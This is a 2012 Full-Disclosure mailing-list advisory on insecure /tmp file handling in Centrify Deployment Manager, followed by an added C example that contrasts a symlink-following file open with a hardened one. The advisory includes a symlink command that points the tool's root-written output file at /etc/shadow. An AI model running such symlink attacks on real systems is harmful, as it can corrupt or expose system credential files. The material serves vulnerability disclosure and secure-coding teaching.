[Full-disclosure] Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling
- From: larry Cashdollar <larry0@xxxxxx>
- Date: Mon, 03 Dec 2012 21:50:22 +0000 (GMT)
<html><body><div><h2>Centrify Deployment Manager v2.1.0.283</h2><hr>
<p>While at a training session for Centrify, I noticed poor
handling of files in /tmp. I was able to overwrite /etc/shadow with the
contents of adcheckDMoutput.
</p><p>I am sure there are more vulnerabilities to be exploited, maybe a
local root - but being this is a training class I should probably
focus.....
</p><pre>total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rw-rw-r-- 1 clyde clyde 188 Dec 3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
drwx------ 2 root root 4096 Dec 3 10:25 vmware-root
drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib
</pre>
<pre>[root@engnew-cen tmp]# ls -l
total 6680
-rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
drwx------ 2 root root 4096 Dec 3 10:25 vmware-root
drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib
</pre>
<pre>[root@engnew-cen tmp]# ls -l
total 6688
<b>-rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput</b>
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde 132 Dec 3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
drwx------ 2 root root 4096 Dec 3 10:25 vmware-root
drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib
</pre>
<pre>[root@engnew-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
</pre>
<pre># ln -s /etc/shadow adcheckDMoutput
# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow
</pre>
<p>I am also assuming the .210 appended to the end of files in /tmp is the major
version number.
</p><p>Larry W. Cashdollar<br>
@_larry0
</p></div></body></html>
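The file handling reported above (a root-owned, fixed-name output file in /tmp that ends up written through a symlink), shown beside a hardened open. This is an added example, not Centrify's code and not part of the original post; the function names and the mkdtemp() sandbox with its victim/report files are constructed for illustration, and it assumes the tool used an ordinary create-and-truncate open.

```c
/* Added example: weak vs. hardened creation of a report file in a shared dir. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* O_NOFOLLOW and mkdtemp() on glibc */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static int put(int fd, const char *data) {   /* write data, close, 0 on success */
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Weak (assumed pattern): follows symlinks and truncates whatever it reaches. */
int write_report_weak(const char *path, const char *data) {
    return put(open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666), data);
}

/* Hardened: the call must create the file itself (O_EXCL), never follows a
 * link (O_NOFOLLOW), owner-only mode. Anything already at path is an error. */
int write_report_safe(const char *path, const char *data) {
    return put(open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600), data);
}

/* Constructed sandbox: <dir>/victim and a symlink <dir>/report -> victim.
 * Runs writer on the link; returns 1 if victim is intact, 0 if clobbered. */
int victim_survives(int (*writer)(const char *, const char *)) {
    char dir[] = "/tmp/tmpdemoXXXXXX", victim[64], lnk[64], buf[32];
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/report", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("original", f); fclose(f);
    if (symlink(victim, lnk) != 0) return -1;
    writer(lnk, "tool output");
    size_t got = 0;
    if ((f = fopen(victim, "r"))) { got = fread(buf, 1, sizeof buf - 1, f); fclose(f); }
    buf[got] = '\0';
    unlink(lnk); unlink(victim); rmdir(dir);
    return strcmp(buf, "original") == 0;
}

int main(void) {
    printf("victim intact: weak=%d safe=%d\n",
           victim_survives(write_report_weak), victim_survives(write_report_safe));
    return 0;
}
```

Creating per-run output with mkstemp() or in a root-only directory instead of a fixed name in /tmp removes the predictable path as well.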